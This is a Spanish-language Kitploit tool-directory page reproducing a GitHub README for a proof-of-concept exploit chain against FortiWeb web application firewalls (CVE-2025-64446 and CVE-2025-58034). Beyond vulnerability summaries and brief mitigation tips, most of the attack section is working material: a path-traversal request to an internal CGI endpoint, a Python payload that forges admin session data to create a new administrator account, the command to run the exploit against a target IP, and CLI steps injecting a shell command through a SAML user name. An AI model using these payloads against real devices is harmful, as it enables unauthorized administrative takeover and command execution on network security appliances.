Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
FORTIWEB_CVE-2025-64446-58034 — Exploit PoC para CVEs de FortiWeb: bypass de autenticación mediante path traversal e inyección de comandos del sistema operativo autenticada. Incluye análisis detallado, cargas útiles y orientación de mitigación para pruebas de seguridad. | Kitploit
Herramientas/GitHubGitHub/eagle-nett/fortiweb_cve-2025-64446-58034
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubeagle-nett/fortiweb_cve-2025-64446-58034

FORTIWEB_CVE-2025-64446-58034

Exploit PoC para CVEs de FortiWeb: bypass de autenticación mediante path traversal e inyección de comandos del sistema operativo autenticada. Incluye análisis detallado, cargas útiles y orientación de mitigación para pruebas de seguridad.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
4hace 5 mesesAún no revisado

Simulación de explotación de FortiWeb (CVE-2025-64446 & CVE-2025-58034)

Nota:

  • Este documento es solo para fines educativos y de investigación de seguridad.
  • No lo utilice para atacar sistemas sin autorización.

1. Resumen

FortiWeb es un dispositivo Web Application Firewall (WAF) utilizado para proteger aplicaciones web.

En el año 2025, se descubrieron dos vulnerabilidades graves:

  • CVE-2025-64446 – Omisión de autenticación mediante Path Traversal
  • CVE-2025-58034 – Inyección de comandos del sistema operativo

2. Resumen de CVE-2025-64446

ElementoContenido
Tipo de vulnerabilidadRelative Path Traversal
Omisión de autenticación
CausaFortiWeb procesa las rutas sin suficiente rigor antes de la autenticación:

- Control de acceso basado en la cadena de ruta lógica
- No normaliza completamente la ruta
- Permite el uso de ../ para acceder a recursos internos
DescripciónAlgunos endpoints de administración pueden ser accedidos sin autenticación válida
Impacto- Bypass completo de autenticación
- Acceso no autorizado a funciones de administrador
- Ruptura del modelo de privilegios
Versiones afectadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

Ejemplo:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. Resumen de CVE-2025-58034


4. Proceso de experimentación (POC)

4.1. Preparación del entorno:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Esto ayuda a evitar conflictos de versiones de librerías, garantizar la estabilidad del entorno de trabajo y limitar el impacto en el sistema.

venv-git

4.2 Explotación

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

Ejecutar la herramienta con Python3:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: La dirección IP aquí es el nombre de host del dispositivo FortiWeb.

exploit

Se obtienen el nombre de usuario y la contraseña -> se procede a iniciar sesión

login

conectar

Explotación exitosa y se crea una nueva cuenta con privilegios de administrador.

4.3 Explotación de CVE-2025-58034 después de iniciar sesión

Después de iniciar sesión con éxito con la nueva cuenta de administrador creada, un atacante puede explotar la vulnerabilidad de inyección de comandos autenticada a través de solicitudes especialmente diseñadas o directamente a través de la interfaz de línea de comandos de FortiWeb CLI:

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb saldrá de la cadena de configuración y ejecutará el comando id durante la configuración de saml-user.

5. Algunas formas de mitigar las vulnerabilidades

  • Actualizar FortiWeb a una versión parcheada.
  • Limitar el acceso a la interfaz de administración.
  • No exponer la interfaz de administración a Internet.
  • Revisar cuentas de administrador inusuales.

6. Referencias adicionales

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
Descargar herramienta
ElementoContenido
Tipo de vulnerabilidadInyección de comandos del sistema operativo (CWE-78)
CausaFortiWeb maneja la entrada de forma insegura al ejecutar comandos del sistema operativo:

- No valida la entrada
- Falta de escape de caracteres especiales
- Transmite datos del usuario directamente a comandos del sistema
DescripciónLa vulnerabilidad requiere autenticación pero permite la inyección de comandos del sistema
Impacto- Ejecución de comandos no deseados
- Acceso a recursos del sistema
- Afecta la integridad y disponibilidad
Versiones afectadas- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11